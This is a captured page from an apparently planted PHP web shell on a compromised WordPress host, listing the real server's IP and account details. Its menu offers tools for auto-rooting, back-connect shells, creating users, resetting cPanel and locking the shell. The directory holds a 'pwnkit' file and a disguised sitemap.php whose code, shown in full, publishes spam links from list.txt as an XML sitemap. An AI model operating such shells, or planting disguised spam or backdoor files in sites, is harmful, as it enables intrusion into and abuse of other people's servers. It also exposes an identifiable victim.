Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.227.209.214
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
manolisurat /
media /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
google26a6f7248d675616.html
53
B
-rw-r--r--
list.txt
58.48
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
sitemap.php
1.26
KB
-rw-r--r--
wp-blog-header.php
4.57
KB
-r--r--r--
wp-cron.php
4.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sitemap.php
<?php $protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http'; $fullUrl = $protocol . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; if (isset($fullUrl)) { $parsedUrl = parse_url($fullUrl); $scheme = isset($parsedUrl['scheme']) ? $parsedUrl['scheme'] : ''; $host = isset($parsedUrl['host']) ? $parsedUrl['host'] : ''; $path = isset($parsedUrl['path']) ? $parsedUrl['path'] : ''; $query = isset($parsedUrl['query']) ? $parsedUrl['query'] : ''; $baseUrl = $scheme . "://" . $host . $path; $urlPath = preg_replace('/\/[^\/]*$/', '', $baseUrl) . '/'; } else { echo "URL saat ini tidak didefinisikan."; exit(); } try { header("Content-type: text/xml; charset=utf-8"); $filename = "list.txt"; $lines = file($filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); echo '<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">'; foreach ($lines as $item) { echo "<url>"; echo "<loc>"; echo $urlPath . '?link=' . rawurlencode($item); echo "</loc>"; echo "</url>"; } echo "</urlset>"; } catch (\Exception $th) { echo "URL saat ini tidak didefinisikan."; exit(); }
Close